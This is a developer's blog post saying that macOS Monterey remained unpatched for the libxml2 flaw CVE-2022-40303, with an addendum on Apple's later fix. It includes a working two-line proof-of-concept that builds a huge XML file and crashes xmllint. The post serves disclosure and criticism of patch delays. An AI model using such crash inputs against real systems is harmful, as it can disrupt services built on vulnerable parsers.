Jeff Johnson (My apps, PayPal.Me)

macOS Monterey still vulnerable to CVE-2022-40303

December 1 2022

On November 9, Apple released macOS Ventura 13.0.1, as well as iOS 16.1.1 and iPadOS 16.1.1. The release notes list two security vulnerabilities fixed.


Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed through improved input validation.

CVE-2022-40303: Maddie Stone of Google Project Zero


Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero

Usually when Apple releases an update to the latest major version of macOS (currently Ventura), they also release security updates for the previous two major versions of macOS (Monterey and Big Sur). In this case, they did not patch the previous versions.

I've found a bug report written by Maddie Stone of Google Project Zero, who discovered the vulnerability. The bug report includes a proof of concept. I tried the proof of concept on the latest version of macOS Monterey, version 12.6.1 (21G217), and the proof of concept worked! Thus, Monterey (and likely Big Sur too) is still vulnerable to CVE-2022-40303. Two weeks later, Apple has failed to patch what is now a zero-day.

I made a couple of trivial modifications to the proof of concept to make it work on macOS. Warning: the PoC creates a 2.15 GB file, so make sure your disk has enough free space. In Terminal, just enter these two commands.

python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > /tmp/name_big.xml
/usr/bin/xmllint --huge /tmp/name_big.xml

You should see an error similar to the following, along with a crash report window. Send the crash report to Apple!

zsh: segmentation fault  /usr/bin/xmllint --huge /tmp/name_big.xml

Afterward you can delete the big file.

rm /tmp/name_big.xml

I also found a bug report for CVE-2022-40304, the second vulnerability fixed by macOS 13.0.1, but I wasn't able to reproduce that crash using the given test case. According to the bug report, "the test case may need to be run multiple times (by xmllint or any other parser using libxml2) to see the crash due to the system time being used to select the random seed", so perhaps I didn't run it enough times, or I was doing something else wrong. Since Monterey and Ventura both use the same open source library libxml2, and Monterey is still vulnerable to CVE-2022-40303, I suspect that it's still vulnerable to CVE-2022-40304 as well. I can't prove that myself, however, like I could with CVE-2022-40303.

Why don't all Mac users just update to Ventura? Well, some of them can't. Ventura dropped support for a number of Mac models: compare Ventura with Monterey system requirements. Another reason is that Ventura wrecked System Preferences. I find the new System Settings practically unusable. I hesitate to link to Twitter, because I've stopped using Twitter, but here's a link to a video demonstrating how unusable System Settings is from the keyboard. Besides System Preferences, Ventura also wrecked the system share menu. If Apple wants Mac users to always install the latest version for safety, then Apple should stop breaking the user interface!


You may not see a crash report window unless you've set Crash Reporter Preferences to Developer mode. This useful app comes with the Xcode Additional Tools.

Crash Reporter Preferences

You can also set Developer mode in Terminal without the app. (You may need to logout afterward.)

defaults write DialogType developer

Addendum December 13 2022

Apple finally patched both CVE-2022-40303 and CVE-2022-40304 today in macOS Monterey 12.6.2 and Big Sur 11.7.2. That left these bugs as 0days for more than a month. This is not responsible behavior by one of the largest corporations in the world.

By the way, I noticed this in About the security content of macOS Ventura 13.1 (but not in macOS Monterey 12.6.2):


Available for: macOS Ventura

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

I didn't know you could shake a Mac to undo?

Jeff Johnson (My apps, PayPal.Me)